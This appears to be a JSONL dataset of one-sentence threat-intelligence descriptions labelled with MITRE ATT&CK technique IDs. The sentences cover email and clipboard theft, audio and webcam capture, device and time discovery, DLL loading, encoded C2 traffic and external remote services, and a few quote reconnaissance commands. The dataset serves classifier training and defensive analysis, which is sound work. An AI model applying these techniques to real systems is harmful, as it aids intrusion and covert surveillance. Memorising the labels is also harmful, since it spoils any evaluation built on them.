{"text1":"Leafminer used a tool called MailSniper to search through the Exchange server mailboxes for keywords.","labels":"['T1114.002']"}
{"text1":"LightNeuron collects Exchange emails matching rules specified in its configuration.","labels":"['T1114.002']"}
{"text1":"Magic Hound has exported emails from compromised Exchange servers.","labels":"['T1114.002']"}
{"text1":"MailSniper can be used for searching through email in Exchange and Office 365 environments.","labels":"['T1114.002']"}
{"text1":"UNC2452 collected emails from specific individuals, such as executives and IT staff, using \"New-MailboxExportRequest\" followed by \"Get-MailboxExportRequest\".","labels":"['T1114.002']"}
{"text1":"Valak can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.","labels":"['T1114.002']"}
{"text1":"Kimsuky has set auto-forward rules on victim's e-mail accounts.","labels":"['T1114.003']"}
{"text1":"LAPSUS$ has set an Office 365 tenant level mail transport rule to send all mail in and out of the targeted organization to the newly created account.","labels":"['T1114.003']"}
{"text1":"Silent Librarian has set up auto forwarding rules on compromised e-mail accounts.","labels":"['T1114.003']"}
{"text1":"A JHUHUGIT variant accesses a screenshot saved in the clipboard and converts it to a JPG image.","labels":"['T1115']"}
{"text1":"APT38 used a Trojan called KEYLIME to collect data from the clipboard.","labels":"['T1115']"}
{"text1":"APT39 has used tools capable of stealing contents of the clipboard.","labels":"['T1115']"}
{"text1":"Agent Tesla can steal data from the victim\u2019s clipboard.","labels":"['T1115']"}
{"text1":"Attor has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.","labels":"['T1115']"}
{"text1":"Cadelspy has the ability to steal data from the clipboard.","labels":"['T1115']"}
{"text1":"Catchamas steals data stored in the clipboard.","labels":"['T1115']"}
{"text1":"Clambling has the ability to capture and store clipboard data.","labels":"['T1115']"}
{"text1":"CosmicDuke copies and exfiltrates the clipboard contents every 30 seconds.","labels":"['T1115']"}
{"text1":"DarkComet can steal data from the clipboard.","labels":"['T1115']"}
{"text1":"Empire can harvest clipboard data on both Windows and macOS systems.","labels":"['T1115']"}
{"text1":"Explosive has a function to use the OpenClipboard wrapper.","labels":"['T1115']"}
{"text1":"FlawedAmmyy can collect clipboard data.","labels":"['T1115']"}
{"text1":"KONNI had a feature to steal data from the clipboard.","labels":"['T1115']"}
{"text1":"MacSpy can steal clipboard contents.","labels":"['T1115']"}
{"text1":"Machete hijacks the clipboard data by creating an overlapped window that listens to keyboard events.","labels":"['T1115']"}
{"text1":"MarkiRAT can capture clipboard content.","labels":"['T1115']"}
{"text1":"Melcoz can monitor content saved to the clipboard.","labels":"['T1115']"}
{"text1":"Metamorfo has a function to hijack data from the clipboard by monitoring the contents of the clipboard and replacing the cryptocurrency wallet with the attacker's.","labels":"['T1115']"}
{"text1":"Operation Wocao has collected clipboard data in plaintext.","labels":"['T1115']"}
{"text1":"ROKRAT can extract clipboard data from a compromised host.","labels":"['T1115']"}
{"text1":"Remcos steals and modifies data from the clipboard.","labels":"['T1115']"}
{"text1":"Remexi collects text from the clipboard.","labels":"['T1115']"}
{"text1":"The executable version of Helminth has a module to log clipboard contents.","labels":"['T1115']"}
{"text1":"TinyZBot contains functionality to collect information from the clipboard.","labels":"['T1115']"}
{"text1":"VERMIN collects data stored in the clipboard.","labels":"['T1115']"}
{"text1":"jRAT can capture clipboard data.","labels":"['T1115']"}
{"text1":"A Helminth VBScript receives a batch script to execute a set of commands in a command prompt.","labels":"['T1119']"}
{"text1":"APT1 used a batch script to perform a series of discovery techniques and saves it to a text file.","labels":"['T1119']"}
{"text1":"APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.","labels":"['T1119', 'T1560']"}
{"text1":"AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration.","labels":"['T1119']"}
{"text1":"Attor has automatically collected data about the compromised system.","labels":"['T1119']"}
{"text1":"BADNEWS monitors USB devices and copies files with certain extensions to a predefined directory.","labels":"['T1119']"}
{"text1":"Bankshot recursively generates a list of files within a directory and sends them back to the control server.","labels":"['T1119']"}
{"text1":"Confucius has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg.","labels":"['T1119']"}
{"text1":"During Frankenstein, the threat actors used Empire to automatically gather the username, domain name, machine name, and other system information.","labels":"['T1119']"}
{"text1":"During Operation Wocao, threat actors used a script to collect information about the infected system.","labels":"['T1119']"}
{"text1":"FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.","labels":"['T1119']"}
{"text1":"For all non-removable drives on a victim, USBStealer executes automated collection of certain files for later exfiltration.","labels":"['T1119']"}
{"text1":"Frankenstein has enumerated hosts via Empire, gathering the username, domain name, machine name, and other system information.","labels":"['T1119']"}
{"text1":"FunnyDream can monitor files for changes and automatically collect them.","labels":"['T1119']"}
{"text1":"Gamaredon Group has deployed scripts on compromised systems that automatically scan for interesting documents.","labels":"['T1119']"}
{"text1":"GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response\/status code, HTTP response headers and values, and data received from the C2 node.","labels":"['T1119']"}
{"text1":"InvisiMole can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.","labels":"['T1119']"}
{"text1":"Ke3chang has performed frequent and scheduled data collection from victim networks.","labels":"['T1119']"}
{"text1":"MESSAGETAP checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.","labels":"['T1119']"}
{"text1":"Metamorfo has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.","labels":"['T1119']"}
{"text1":"Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt).","labels":"['T1119']"}
{"text1":"Mustang Panda used custom batch scripts to collect files automatically from a targeted system.","labels":"['T1119']"}
{"text1":"OilRig has used automated collection.","labels":"['T1119']"}
{"text1":"OutSteel can automatically scan for and collect files with specific extensions.","labels":"['T1119']"}
{"text1":"Patchwork developed a file stealer to search C:\\ and collect files with certain extensions. Patchwork also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.","labels":"['T1119']"}
{"text1":"PoetRAT used file system monitoring to track modification and enable automatic exfiltration.","labels":"['T1119']"}
{"text1":"PoshC2 contains a module for recursively parsing through files and directories to gather valid credit card numbers.","labels":"['T1119']"}
{"text1":"RTM monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.","labels":"['T1119']"}
{"text1":"Ramsay can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.","labels":"['T1119']"}
{"text1":"Sidewinder has used tools to automatically collect system and network configuration information.","labels":"['T1119']"}
{"text1":"StrongPity has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.","labels":"['T1119']"}
{"text1":"TajMahal has the ability to index and compress files into a send queue for exfiltration.","labels":"['T1119']"}
{"text1":"VERMIN saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt .","labels":"['T1119']"}
{"text1":"Valak can download a module to search for and build a report of harvested credential data.","labels":"['T1119']"}
{"text1":"WindTail can identify and add files that possess specific file extensions to an array for archiving.","labels":"['T1119']"}
{"text1":"Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.","labels":"['T1119']"}
{"text1":"ccf32 can be used to automatically collect files from a compromised host.","labels":"['T1119']"}
{"text1":"ADVSTORESHELL can list connected devices.","labels":"['T1120']"}
{"text1":"APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim.","labels":"['T1120']"}
{"text1":"APT37 has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices.","labels":"['T1120']"}
{"text1":"Attor has a plugin that collects information about inserted storage devices, modems, and phone devices.","labels":"['T1120']"}
{"text1":"BADNEWS checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.","labels":"['T1120']"}
{"text1":"BackdoorDiplomacy has used an executable to detect removable media, such as USB flash drives.","labels":"['T1120']"}
{"text1":"Bandook can detect USB devices.","labels":"['T1120']"}
{"text1":"BlackEnergy can gather very specific information about attached USB devices, to include device instance ID and drive geometry.","labels":"['T1120']"}
{"text1":"Cadelspy has the ability to steal information about printers and the documents sent to printers.","labels":"['T1120']"}
{"text1":"Crimson has the ability to discover pluggable\/removable drives to extract files from.","labels":"['T1120']"}
{"text1":"Crutch can monitor for removable drives being plugged into the compromised machine.","labels":"['T1120']"}
{"text1":"During Operation Wocao, threat actors discovered removable disks attached to a system.","labels":"['T1120']"}
{"text1":"DustySky can detect connected USB devices.","labels":"['T1120']"}
{"text1":"Equation has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.","labels":"['T1120']"}
{"text1":"Ferocious can run \"GET.WORKSPACE\" in Microsoft Excel to check if a mouse is present.","labels":"['T1120']"}
{"text1":"FlawedAmmyy will attempt to detect if a usable smart card is current inserted into a card reader.","labels":"['T1120']"}
{"text1":"Mongall can identify removable media attached to compromised hosts.","labels":"['T1120']"}
{"text1":"MoonWind obtains the number of removable drives from the victim.","labels":"['T1120']"}
{"text1":"ObliqueRAT can discover pluggable\/removable drives to extract files from.","labels":"['T1120']"}
{"text1":"OilRig has used tools to identify if a mouse is connected to a targeted system.","labels":"['T1120']"}
{"text1":"Operation Wocao has discovered removable disks attached to a system.","labels":"['T1120']"}
{"text1":"QakBot can identify peripheral devices on targeted systems.","labels":"['T1120']"}
{"text1":"QuietSieve can identify and search removable drives for specific file name extensions.","labels":"['T1120']"}
{"text1":"RTM can obtain a list of smart card readers attached to the victim.","labels":"['T1120']"}
{"text1":"Ragnar Locker may attempt to connect to removable drives and mapped network drives.","labels":"['T1120']"}
{"text1":"Ramsay can scan for removable media which may contain documents for collection.","labels":"['T1120']"}
{"text1":"Stuxnet enumerates removable drives for infection.","labels":"['T1120']"}
{"text1":"T9000 searches through connected drives for removable storage devices.","labels":"['T1120']"}
{"text1":"TajMahal has the ability to identify connected Apple devices.","labels":"['T1120']"}
{"text1":"TeamTNT has searched for attached VGA devices using lspci.","labels":"['T1120']"}
{"text1":"Turla has used \"fsutil fsinfo drives\" to list connected drives.","labels":"['T1120']"}
{"text1":"USBStealer monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.","labels":"['T1120']"}
{"text1":"USBferry can check for connected USB devices.","labels":"['T1120']"}
{"text1":"WannaCry contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device.","labels":"['T1120']"}
{"text1":"WastedLocker can enumerate removable drives prior to the encryption process.","labels":"['T1120']"}
{"text1":"XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running \"ls -la ~\/Library\/Application\\ Support\/MobileSync\/Backup\/\".","labels":"['T1120']"}
{"text1":"Zebrocy enumerates information about connected storage devices.","labels":"['T1120']"}
{"text1":"jRAT can map UPnP ports.","labels":"['T1120']"}
{"text1":"APT37 has used an audio capturing utility known as SOUNDWAVE that captures microphone input.","labels":"['T1123']"}
{"text1":"Attor's has a plugin that is capable of recording audio using available input sound devices.","labels":"['T1123']"}
{"text1":"Cadelspy has the ability to record audio from the compromised host.","labels":"['T1123']"}
{"text1":"Cobian RAT has a feature to perform voice recording on the victim\u2019s machine.","labels":"['T1123']"}
{"text1":"Crimson can perform audio surveillance using microphones.","labels":"['T1123']"}
{"text1":"DOGCALL can capture microphone data from the victim's machine.","labels":"['T1123']"}
{"text1":"DarkComet can listen in to victims' conversations through the system\u2019s microphone.","labels":"['T1123']"}
{"text1":"EvilGrab has the capability to capture audio from a victim machine.","labels":"['T1123']"}
{"text1":"Flame can record audio using any existing hardware recording devices.","labels":"['T1123']"}
{"text1":"InvisiMole can record sound using input audio devices.","labels":"['T1123']"}
{"text1":"Janicab captured audio and sent it out to a C2 server.","labels":"['T1123']"}
{"text1":"MacMa has the ability to record audio.","labels":"['T1123']"}
{"text1":"MacSpy can record the sounds from microphones on a computer.","labels":"['T1123']"}
{"text1":"Machete captures audio from the computer\u2019s microphone.","labels":"['T1123']"}
{"text1":"NanoCore can capture audio feeds from the system.","labels":"['T1123']"}
{"text1":"Pupy can record sound with the microphone.","labels":"['T1123']"}
{"text1":"ROKRAT has an audio capture and eavesdropping module.","labels":"['T1123']"}
{"text1":"Remcos can capture data from the system\u2019s microphone.","labels":"['T1123']"}
{"text1":"Revenge RAT has a plugin for microphone interception.","labels":"['T1123']"}
{"text1":"T9000 uses the Skype API to record audio and video calls. It writes encrypted data to \"%APPDATA%\\Intel\\Skype\".","labels":"['T1123', 'T1125']"}
{"text1":"TajMahal has the ability to capture VoiceIP application audio on an infected host.","labels":"['T1123']"}
{"text1":"VERMIN can perform audio capture.","labels":"['T1123']"}
{"text1":"jRAT can capture microphone recordings.","labels":"['T1123']"}
{"text1":"AppleSeed can pull a timestamp from the victim's machine.","labels":"['T1124']"}
{"text1":"As part of the data reconnaissance phase, Proxysvc grabs the system time to send back to the control server.","labels":"['T1124']"}
{"text1":"Astaroth collects the timestamp from the infected machine.","labels":"['T1124']"}
{"text1":"BRONZE BUTLER has used \"net time\" to check the local time on a target system.","labels":"['T1124']"}
{"text1":"BendyBear has the ability to determine local time on a compromised host.","labels":"['T1124']"}
{"text1":"Bisonal can check the system time set on the infected host.","labels":"['T1124']"}
{"text1":"Carbon uses the command \"net time \\\\127.0.0.1\" to get information the system\u2019s time.","labels":"['T1124']"}
{"text1":"Chimera has used \"time \/t\" and \"net time \\\\ip\/hostname\" for system time discovery.","labels":"['T1124']"}
{"text1":"Clambling can determine the current time.","labels":"['T1124']"}
{"text1":"ComRAT has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday).","labels":"['T1124']"}
{"text1":"Conficker uses the current UTC victim system date for domain generation and connects to time servers to determine the current date.","labels":"['T1124']"}
{"text1":"DCSrv can compare the current time on an infected host with a configuration value to determine when to start the encryption process.","labels":"['T1124']"}
{"text1":"DRATzarus can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to inspect system time.","labels":"['T1124']"}
{"text1":"DarkWatchman can collect the time zone information from the system.","labels":"['T1124']"}
{"text1":"Darkhotel malware can obtain system time from a compromised host.","labels":"['T1124']"}
{"text1":"During C0015, the threat actors used the command `net view \/all time` to gather the local time of a compromised network.","labels":"['T1124']"}
{"text1":"During Operation CuckooBees, the threat actors used the `net time` command as part of their advanced reconnaissance.","labels":"['T1124']"}
{"text1":"Egregor contains functionality to query the local\/system time.","labels":"['T1124']"}
{"text1":"Epic uses the \"net time\" command  to get the system time from the machine and collect the current date and time zone information.","labels":"['T1124']"}
{"text1":"FunnyDream can check system time to help determine when changes were made to specified files.","labels":"['T1124']"}
{"text1":"GRIFFON has used a reconnaissance module that can be used to retrieve the date and time of the system.","labels":"['T1124']"}
{"text1":"GoldMax can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server.","labels":"['T1124']"}
{"text1":"Grandoreiro can determine the time on the victim machine via IPinfo.","labels":"['T1124']"}
{"text1":"GravityRAT can obtain the date and time of a system.","labels":"['T1124']"}
{"text1":"Green Lambert can collect the date and time from a compromised host.","labels":"['T1124']"}
{"text1":"HOPLIGHT has been observed collecting system time from victim machines.","labels":"['T1124']"}
{"text1":"Higaisa used a function to gather the current time.","labels":"['T1124']"}
{"text1":"Metamorfo uses JavaScript to get the system time.","labels":"['T1124']"}
{"text1":"NOKKI can collect the current timestamp of the victim's machine.","labels":"['T1124']"}
{"text1":"Okrum can obtain the date and time of the compromised system.","labels":"['T1124']"}
{"text1":"PipeMon can send time zone information from a compromised host to C2.","labels":"['T1124']"}
{"text1":"PowerDuke has commands to get the time the machine was built, the time, and the time zone.","labels":"['T1124']"}
{"text1":"QakBot can identify the system time on a targeted host.","labels":"['T1124']"}
{"text1":"SILENTTRINITY can collect start time information from a compromised host.","labels":"['T1124']"}
{"text1":"SombRAT can execute \"getinfo\"  to discover the current time on a compromised host.","labels":"['T1124']"}
{"text1":"StoneDrill can obtain the current date and time of the victim machine.","labels":"['T1124']"}
{"text1":"StrifeWater can collect the time zone from the victim's machine.","labels":"['T1124']"}
{"text1":"Stuxnet collects the time and date of a system when it is infected.","labels":"['T1124']"}
{"text1":"TAINTEDSCRIBE can execute \"GetLocalTime\" for time discovery.","labels":"['T1124']"}
{"text1":"Taidoor can use \"GetLocalTime\" and \"GetSystemTime\" to collect system time.","labels":"['T1124']"}
{"text1":"The White Company has checked the current date on the victim system.","labels":"['T1124']"}
{"text1":"Turla surveys a system upon check-in to discover the system time by using the \"net time\" command.","labels":"['T1124']"}
{"text1":"UPPERCUT has the capability to obtain the time zone information and current timestamp of the victim\u2019s machine.","labels":"['T1124']"}
{"text1":"WindTail has the ability to generate the current date and time.","labels":"['T1124']"}
{"text1":"ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2.","labels":"['T1124']"}
{"text1":"Zebrocy gathers the current time zone and date information from the system.","labels":"['T1124']"}
{"text1":"build_downer has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.","labels":"['T1124']"}
{"text1":"Agent Tesla can access the victim\u2019s webcam and record video.","labels":"['T1125']"}
{"text1":"Bandook has modules that are capable of capturing video from a victim's webcam.","labels":"['T1125']"}
{"text1":"Clambling can record screen content in AVI format.","labels":"['T1125']"}
{"text1":"ConnectWise can record video on remote hosts.","labels":"['T1125']"}
{"text1":"Crimson can capture webcam video on targeted systems.","labels":"['T1125']"}
{"text1":"DarkComet can access the victim\u2019s webcam to take pictures.","labels":"['T1125']"}
{"text1":"Empire can capture webcam data on Windows and macOS systems.","labels":"['T1125']"}
{"text1":"EvilGrab has the capability to capture video from a victim machine.","labels":"['T1125']"}
{"text1":"FIN7 created a custom video recording capability that could be used to monitor operations in the victim's environment.","labels":"['T1125']"}
{"text1":"Imminent Monitor has a remote webcam monitoring capability.","labels":"['T1125']"}
{"text1":"InvisiMole can remotely activate the victim\u2019s webcam to capture content.","labels":"['T1125']"}
{"text1":"Kazuar captures images from the webcam.","labels":"['T1125']"}
{"text1":"NanoCore can access the victim's webcam and capture data.","labels":"['T1125']"}
{"text1":"ObliqueRAT can capture images from webcams on compromised hosts.","labels":"['T1125']"}
{"text1":"PcShare can capture camera video as part of its collection process.","labels":"['T1125']"}
{"text1":"PoetRAT has used a Python tool named Bewmac to record the webcam on compromised hosts.","labels":"['T1125']"}
{"text1":"QuasarRAT can perform webcam viewing.","labels":"['T1125']"}
{"text1":"Remcos can access a system\u2019s webcam and take pictures.","labels":"['T1125']"}
{"text1":"SDBbot has the ability to record video on a compromised host.","labels":"['T1125']"}
{"text1":"TajMahal has the ability to capture webcam video.","labels":"['T1125']"}
{"text1":"WarzoneRAT can access the webcam on a victim's machine.","labels":"['T1125']"}
{"text1":"ZxShell has a command to perform video device spying.","labels":"['T1125']"}
{"text1":"jRAT has the capability to capture video from a webcam.","labels":"['T1125']"}
{"text1":"A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques.","labels":"['T1127']"}
{"text1":"Empire can use built-in modules to abuse trusted utilities like MSBuild.exe.","labels":"['T1127', 'T1127.001']"}
{"text1":"A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.","labels":"['T1127.001']"}
{"text1":"During Frankenstein, the threat actors used MSbuild to execute an actor-created file.","labels":"['T1127.001']"}
{"text1":"Astaroth uses the LoadLibraryExW() function to load additional modules.","labels":"['T1129']"}
{"text1":"Attor's dispatcher can execute additional plugins by loading the respective DLLs.","labels":"['T1129']"}
{"text1":"BLINDINGCAN has loaded and executed DLLs in memory during runtime on a victim machine.","labels":"['T1129']"}
{"text1":"BOOSTWRITE has used the DWriteCreateFactory() function to load additional modules.","labels":"['T1129']"}
{"text1":"Bumblebee can use `LoadLibrary` to attempt to execute GdiPlus.dll.","labels":"['T1129']"}
{"text1":"Dtrack contains a function that calls \"LoadLibrary\" and \"GetProcAddress\".","labels":"['T1129']"}
{"text1":"FoggyWeb's loader can call the \"load()\" function to load the FoggyWeb dll into an Application Domain on a compromised AD FS server.","labels":"['T1129']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can load and call DLL functions.","labels":"['T1129']"}
{"text1":"KillDisk loads and executes functions from a DLL.","labels":"['T1129']"}
{"text1":"Metamorfo had used AutoIt to load and execute the DLL payload.","labels":"['T1129']"}
{"text1":"PipeMon has used call to \"LoadLibrary\" to load its installer. PipeMon loads its modules using reflective loading or custom shellcode.","labels":"['T1129']"}
{"text1":"Stuxnet calls LoadLibrary then executes exports from a DLL.","labels":"['T1129']"}
{"text1":"TajMahal has the ability to inject the \"LoadLibrary\" call template DLL into running processes.","labels":"['T1129']"}
{"text1":"gh0st RAT can load DLLs into memory.","labels":"['T1129']"}
{"text1":"After encrypting C2 data, BADNEWS converts it into a hexadecimal representation and then encodes it into base64.","labels":"['T1132']"}
{"text1":"H1N1 obfuscates C2 traffic with an altered version of base64.","labels":"['T1132']"}
{"text1":"Linux Rabbit sends the payload from the C2 server as an encoded URL parameter.","labels":"['T1132']"}
{"text1":"Mythic provides various transform functions to encode and\/or randomize C2 data.","labels":"['T1132']"}
{"text1":"Ursnif has used encoded data in HTTP URLs for C2.","labels":"['T1132']"}
{"text1":"A JHUHUGIT variant encodes C2 POST data base64.","labels":"['T1132.001']"}
{"text1":"APT33 has used base64 to encode command and control traffic.","labels":"['T1132.001']"}
{"text1":"An APT19 HTTP malware variant used Base64 to encode communications to the C2 server.","labels":"['T1132.001']"}
{"text1":"Astaroth encodes data using Base64 before sending it to the C2 server.","labels":"['T1132.001']"}
{"text1":"AutoIt backdoor has sent a C2 response that was base64-encoded.","labels":"['T1132.001']"}
{"text1":"BADNEWS encodes C2 traffic with base64.","labels":"['T1132.001']"}
{"text1":"BS2005 uses Base64 encoding for communication in the message body of an HTTP request.","labels":"['T1132.001']"}
{"text1":"BabyShark has encoded data using certutil before exfiltration.","labels":"['T1132.001']"}
{"text1":"Bisonal has encoded binary data with Base64 and ASCII.","labels":"['T1132.001']"}
{"text1":"Bumblebee has the ability to base64 encode C2 server responses.","labels":"['T1132.001']"}
{"text1":"C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding.","labels":"['T1132.001']"}
{"text1":"Carbanak encodes the message body of HTTP traffic with Base64.","labels":"['T1132.001']"}
{"text1":"ChChes can encode C2 data with a custom technique that utilizes Base64.","labels":"['T1132.001']"}
{"text1":"Chaes has used Base64 to encode C2 communications.","labels":"['T1132.001']"}
{"text1":"CharmPower can send additional modules over C2 encoded with base64.","labels":"['T1132.001']"}
{"text1":"Cobian RAT obfuscates communications with the C2 server using Base64 encoding.","labels":"['T1132.001']"}
{"text1":"CreepySnail can use Base64 to encode its C2 traffic.","labels":"['T1132.001']"}
{"text1":"DarkWatchman encodes data using hexadecimal representation before sending it to the C2 server.","labels":"['T1132.001']"}
{"text1":"Daserf uses custom base64 encoding to obfuscate HTTP traffic.","labels":"['T1132.001']"}
{"text1":"Denis encodes the data sent to the server in Base64.","labels":"['T1132.001']"}
{"text1":"Dipsind encodes C2 traffic with base64.","labels":"['T1132.001']"}
{"text1":"DnsSystem can Base64 encode data sent to C2.","labels":"['T1132.001']"}
{"text1":"Ebury has encoded C2 traffic in hexadecimal format.","labels":"['T1132.001']"}
{"text1":"Elise exfiltrates data using cookie values that are Base64-encoded.","labels":"['T1132.001']"}
{"text1":"For C2 over HTTP, Helminth encodes data with base64 and sends it via the \"Cookie\" field of HTTP requests. For C2 over DNS, Helminth converts ASCII characters into their hexadecimal values and sends the data in cleartext.","labels":"['T1132.001']"}
{"text1":"Fysbis can use Base64 to encode its C2 traffic.","labels":"['T1132.001']"}
{"text1":"GrimAgent can base64 encode C2 replies.","labels":"['T1132.001']"}
{"text1":"HAFNIUM has used ASCII encoding for C2 traffic.","labels":"['T1132.001']"}
{"text1":"HOPLIGHT has utilized Zlib compression to obfuscate the communications payload.","labels":"['T1132.001']"}
{"text1":"Ixeshe uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.","labels":"['T1132.001']"}
{"text1":"KONNI has used a custom base64 key to encode stolen data before exfiltration.","labels":"['T1132.001']"}
{"text1":"Kazuar encodes communications to the C2 server in Base64.","labels":"['T1132.001']"}
{"text1":"Kessel has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.","labels":"['T1132.001']"}
{"text1":"Kevin can Base32 encode chunks of output files during exfiltration.","labels":"['T1132.001']"}
{"text1":"Machete has used base64 encoding.","labels":"['T1132.001']"}
{"text1":"MechaFlounder has the ability to use base16 encoded strings in C2.","labels":"['T1132.001']"}
{"text1":"Mis-Type uses Base64 encoding for C2 traffic.","labels":"['T1132.001']"}
{"text1":"Misdat network traffic is Base64-encoded plaintext.","labels":"['T1132.001']"}
{"text1":"Mongall can use Base64 to encode information sent to its C2.","labels":"['T1132.001']"}
{"text1":"More_eggs has used basE91 encoding, along with encryption, for C2 communication.","labels":"['T1132.001']"}
{"text1":"Mori can use Base64 encoded JSON libraries used in C2.","labels":"['T1132.001']"}
{"text1":"MuddyWater has used tools to encode C2 communications including Base64 encoding.","labels":"['T1132.001']"}
{"text1":"Octopus has encoded C2 communications in Base64.","labels":"['T1132.001']"}
{"text1":"Okrum has used base64 to encode C2 communication.","labels":"['T1132.001']"}
{"text1":"Patchwork used Base64 to encode C2 traffic.","labels":"['T1132.001']"}
{"text1":"PingPull can encode C2 traffic with Base64.","labels":"['T1132.001']"}
{"text1":"PowerShower has the ability to encode C2 communications with base64 encoding.","labels":"['T1132.001']"}
{"text1":"Prikormka encodes C2 traffic with Base64.","labels":"['T1132.001']"}
{"text1":"QUADAGENT encodes C2 communications with base64.","labels":"['T1132.001']"}
{"text1":"QakBot can Base64 encode system information sent to C2.","labels":"['T1132.001']"}
{"text1":"RDAT can communicate with the C2 via base32-encoded subdomains.","labels":"['T1132.001']"}
{"text1":"Ramsay has used base64 to encode its C2 traffic.","labels":"['T1132.001']"}
{"text1":"Responses from the Pisloader C2 server are base32-encoded.","labels":"['T1132.001']"}
{"text1":"RogueRobin base64 encodes strings that are sent to the C2 over its DNS tunnel.","labels":"['T1132.001']"}
{"text1":"SMOKEDHAM has encoded its C2 traffic with Base64.","labels":"['T1132.001']"}
{"text1":"STARWHALE has the ability to hex-encode collected data from an infected host.","labels":"['T1132.001']"}
{"text1":"Sandworm Team's BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server.","labels":"['T1132.001']"}
{"text1":"SeaDuke C2 traffic is base64-encoded.","labels":"['T1132.001']"}
{"text1":"Several BRONZE BUTLER tools encode data with base64 when posting it to a C2 server.","labels":"['T1132.001']"}
{"text1":"SideTwist has used Base64 for encoded C2 traffic.","labels":"['T1132.001']"}
{"text1":"Sliver can use standard encoding techniques like gzip and hex to ASCII to encode the C2 communication payload.","labels":"['T1132.001']"}
{"text1":"Some Backdoor.Oldrea samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.","labels":"['T1132.001']"}
{"text1":"Some Felismus samples use a custom method for C2 traffic that utilizes Base64.","labels":"['T1132.001']"}
{"text1":"Squirrelwaffle has encoded its communications to C2 servers using Base64.","labels":"['T1132.001']"}
{"text1":"Stuxnet transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.","labels":"['T1132.001']"}
{"text1":"TA551 has used encoded ASCII text for initial C2 communications.","labels":"['T1132.001']"}
{"text1":"TrickBot can Base64-encode C2 commands.","labels":"['T1132.001']"}
{"text1":"Tropic Trooper has used base64 encoding to hide command strings delivered from the C2.","labels":"['T1132.001']"}
{"text1":"Valak has returned C2 data as encoded ASCII.","labels":"['T1132.001']"}
{"text1":"WellMess has used Base64 encoding to uniquely identify communication to and from the C2.","labels":"['T1132.001']"}
{"text1":"Zebrocy has used URL\/Percent Encoding on data exfiltrated via HTTP POST requests.","labels":"['T1132.001']"}
{"text1":"down_new has the ability to base64 encode C2 communications.","labels":"['T1132.001']"}
{"text1":"gh0st RAT has used Zlib to compress C2 communications data before encrypting it.","labels":"['T1132.001']"}
{"text1":"njRAT uses Base64 encoding for C2 traffic.","labels":"['T1132.001']"}
{"text1":"xCaon has used Base64 to encode its C2 traffic.","labels":"['T1132.001']"}
{"text1":"Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed.","labels":"['T1132.002']"}
{"text1":"InvisiMole can use a modified base32 encoding to encode data within the subdomain of C2 requests.","labels":"['T1132.002']"}
{"text1":"Newer variants of BACKSPACE will encode C2 communications with a custom system.","labels":"['T1132.002']"}
{"text1":"PowGoop can use a modified Base64 encoding mechanism to send data to and from the C2 server.","labels":"['T1132.002']"}
{"text1":"RDAT can communicate with the C2 via subdomains that utilize base64 with character substitutions.","labels":"['T1132.002']"}
{"text1":"ShadowPad has encoded data as readable Latin characters.","labels":"['T1132.002']"}
{"text1":"Small Sieve can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic.","labels":"['T1132.002']"}
{"text1":"APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts.","labels":"['T1133']"}
{"text1":"APT29 has used compromised identities to access networks via SSH,  VPNs, and other remote access tools.","labels":"['T1133']"}
{"text1":"APT34 uses remote services such as VPN, Citrix, or OWA to persist in an environment.","labels":"['T1133']"}
